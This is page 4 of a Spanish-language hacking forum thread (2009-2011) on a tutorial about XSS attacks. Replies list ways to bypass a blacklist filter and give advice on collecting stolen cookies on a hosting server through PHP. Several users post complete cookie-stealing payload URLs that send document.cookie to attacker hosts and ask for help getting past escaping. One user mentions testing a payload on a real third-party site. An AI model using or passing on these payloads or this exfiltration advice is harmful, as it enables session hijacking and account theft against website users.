elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
12 Febrero 2012, 21:34  


+  Foro de elhacker.net
|-+  Informática
| |-+  Tutoriales - Documentación
| | |-+  [::Tutorial::] - Ataques XSS
0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: 1 2 3 [4] Ir Abajo Respuesta Imprimir
Autor Tema: [::Tutorial::] - Ataques XSS  (Leído 94,335 veces)
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.946


Lavando Platos


Ver Perfil WWW
Re: [::Tutorial::] - Ataques XSS
« Respuesta #45 en: 17 Junio 2009, 10:29 »

se me viene a la mente.. <embed src="//sirdarckcat.net/xss.swf"> o.. <script/src=//0x.lv/.. y la vdd me da flojera pensar en mas xD la cantidad de formas de burlar ese filtro son infinitas..

esta basado en blacklisting (primer error), usa una lista de tags muy incompleta (segundo error), asume que el codigo que mandara el atacante es valido (tercer error), no toma en cuenta las extensiones de los navegadores (cuarto error), y hay mas errores pero ando con flojera.

Saludos!!


En línea

KarlosVid(ÊÇ)


Desconectado Desconectado

Mensajes: 493


..::(KarlosVidEC)::..


Ver Perfil WWW
Re: [::Tutorial::] - Ataques XSS
« Respuesta #46 en: 20 Junio 2009, 02:32 »

sirdarckcat, no sabia que era miembro del STAFF de elhacker.net  :-( Con el respeto que se merece, me gustaria saber como prevenir esos ataques :¬¬. Uno sabe que nadie es perfecto, pero con la ayuda de uno, se puede mejorar la programación.  ;) Me gustaría que saber como usted crearía la función, para prevenirnos de los ataques XSS.


« Última modificación: 3 Noviembre 2009, 20:03 por KarlosVid(ÊÇ) » En línea

Darioxhcx


Desconectado Desconectado

Mensajes: 2.140


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #47 en: 20 Junio 2009, 02:44 »

html_entities ?
En línea

KarlosVid(ÊÇ)


Desconectado Desconectado

Mensajes: 493


..::(KarlosVidEC)::..


Ver Perfil WWW
Re: [::Tutorial::] - Ataques XSS
« Respuesta #48 en: 20 Junio 2009, 03:12 »

 ;D Si pues, solo quería ver otras ideas, para así mejorarla. Todos saben que nada es fácil y todo se puede.  ::) Estamos para ayudarnos.  :o
En línea

Skeletron


Desconectado Desconectado

Mensajes: 1.686


A long way to go


Ver Perfil WWW
Re: [::Tutorial::] - Ataques XSS
« Respuesta #49 en: 18 Noviembre 2009, 15:21 »

Hola gente..
Hay manera de enviar un e-mail con la cookie con javascript?
O lo mas recomendable es escribir en algun archivo de algun hosting?
En línea

jdc


Desconectado Desconectado

Mensajes: 3.226


janito dos cuatro...


Ver Perfil WWW
Re: [::Tutorial::] - Ataques XSS
« Respuesta #50 en: 18 Noviembre 2009, 15:24 »

Lo más recomendable es guardar en hosting a travez de php, aunque junto con guardarla podrías mandarla al mismo tiempo con php a tú correo :) siempre con php, no creo que javascript tenga funciones para enviar correos ya que se ejecuta de lado del cliente
En línea

FL4M4-D0R4D4

Desconectado Desconectado

Mensajes: 1


www.sereforma.edu.mx/admin


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #51 en: 11 Junio 2010, 01:03 »

Hola amigo intente ponerlo el primero codigo (<script>alert()</script>) y al momento y me salio esto la pagina es www.z8games.com

no se si es algo malo o bueno ( Soy novato)
En línea
jdc


Desconectado Desconectado

Mensajes: 3.226


janito dos cuatro...


Ver Perfil WWW
Re: [::Tutorial::] - Ataques XSS
« Respuesta #52 en: 11 Junio 2010, 06:30 »

Eso es porque el programador dejo mostrando los errores, no significa que sea vulnerable por si misma.
En línea

Danielyyo

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #53 en: 5 Septiembre 2010, 17:33 »

Hola a todos,

  El caso es que ando probando esta forma de ataque XSS con una aplicación vulnerable, y otra aplicación malintencionada, ambas creadas y alojadas por mi, y no consigo hacerlo funcionar. El codigo de la aplicacion malintencionada es exactamente el propuesto aqui para copiar la cookie a "archivo.txt" y la "url maligna" queda del siguiente modo:
Código:
http://80.34.108.239/hackw20/application/user_management/login.php?msg=<script>window.location='http://127.0.0.1/evil/application/cookie_steal.php?cookie='+document.cookie;</script>;
El caso es que al ver posteriormente el codigo fuente de la pagina, parece que en navegador (probado en opera y en chrome) inserta caracteres de escape para las comillas simples, es decir ' -> \' con lo que parece que los navegadores ya proporcionan proteccion contra este tipo de ataque. He probado a cambiar desde la ? a hexadecimal.., a cambiar las comillas simples por dobles, y nada. Unicamente al cambiar las simples por graves ' -> ` parece que el navegador no las toca, pero tampoco funciona. ¿Alguna idea de si este comportamiento es asi, o estoy haciendo algo mal? En caso de que sea asi ¿como lo engañamos? Gracias.

Saludos!
En línea
jilipum

Desconectado Desconectado

Mensajes: 13


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #54 en: 23 Octubre 2010, 01:22 »

Eh hola a todos que hay de nuevo pipol , ultimamente pasaba bastante por aquí aparte de por otros  sitios similiares... y nada que com ultimamte estoy muy desocupado y motivado ,y aparte de esta pregunta, que ha quedao abierta al publico ....

pues haber si se pasa alguién de buen rollo y aclara el ultimo mensaje de danielyyo...
lo pido porfavor es que se me ace un poco duro estar leiendo tó el post y quedarme con dudas en el ultimo sms...   

no me quejo de nada esto se que es en todos los sitios lo que me pongo a buscar cosas del metasploit por ejemplo y acavo leiendo estas cosas que aunque se aprende mucho y puedan servir de gran utilidad, me desvian demasiado...

¿aún funciona con algo esta teknika o ya está parcheada ? y si ya esta parcheada, me pregunto también, ¿si no hay forma de dar permisos como a los firewalls o modificar antes algo en el host/ip victima por ejemplo mediante una shell u argo?


En línea
pelonms7

Desconectado Desconectado

Mensajes: 6



Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #55 en: 9 Febrero 2011, 15:15 »

Saludos,

Estuve intentando el tutorial y me parece genial, lo malo es que no se estan guardando las cookies en el archivo txt, revisando una y otra ves el tutorial vi que en la ultima parte tiene el boton buscar (&buscar) para que se pueda ejecutar, yo NO lo estoy haciendo en el campo de busqueda lo estoy haciendo directamente en el URL, y vi que decia que necesita del boton buscar para que se pueda ejecutar, en este caso que no hay boton buscar como se hace para ejecutarlo

asi deberia quedar
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;

asi se ve el mio
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>

como puedo hacer para que se ejecute? Saludos
En línea

Costa Rica WOW!!!!
Páginas: 1 2 3 [4] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines